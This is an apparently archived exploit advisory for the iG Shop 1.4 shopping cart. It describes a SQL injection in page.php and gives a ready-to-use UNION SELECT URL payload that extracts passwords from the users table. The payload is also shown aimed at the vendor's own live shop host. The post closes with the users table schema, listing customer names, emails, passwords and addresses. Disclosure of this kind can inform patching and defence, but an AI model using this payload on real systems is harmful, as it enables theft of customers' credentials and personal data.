iG Shop version 1.4 suffers from a remote SQL injection vulnerability in page.php.
98815be45948358d0ae796c3679467e0c95d3875c35d3e2dffafc1685fe82159Discovered by: gsy & kerem125
Website: www.kerem125.com
Script Download: http://www.igeneric.co.uk/ig-shopping-cart.html
exploit:/shop/page.php?page_type=catalog_navigate&type_id[]=-99%20union/**/select/**/password/**/from/**/users/*
example:http://shop.igeneric.co.uk/shop/page.php?page_type=catalog_navigate&type_id[]=-99%20union/**/select/**/password/**/from/**/users/*
contact: by_gsy@hotmail.com & kerem125@kerem125.com
Special thx to:by_emr3 , ercu_145, bolivar, voltigore, f10
# user_id int(11) NOT NULL auto_increment,
# fname varchar(50) NOT NULL default '',
# lname varchar(50) NOT NULL default '',
# email varchar(100) NOT NULL default '',
# password varchar(100) NOT NULL default '',
# salutation varchar(5) NOT NULL default '',
# bill_address varchar(200) NOT NULL default '',
# bill_address_2 varchar(100) NOT NULL default '',
# bill_city varchar(50) NOT NULL default '',
# bill_post_code varchar(15) NOT NULL default '',
# bill_country varchar(20) NOT NULL default '',
# bill_phone varchar(15) NOT NULL default '',
# ship_address varchar(200) NOT NULL default '',
# ship_address_2 varchar(100) NOT NULL default '',
# ship_city varchar(50) NOT NULL default '',
# ship_post_code varchar(15) NOT NULL default '',
# ship_country varchar(20) NOT NULL default '',
# ship_phone varchar(15) NOT NULL default '',
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed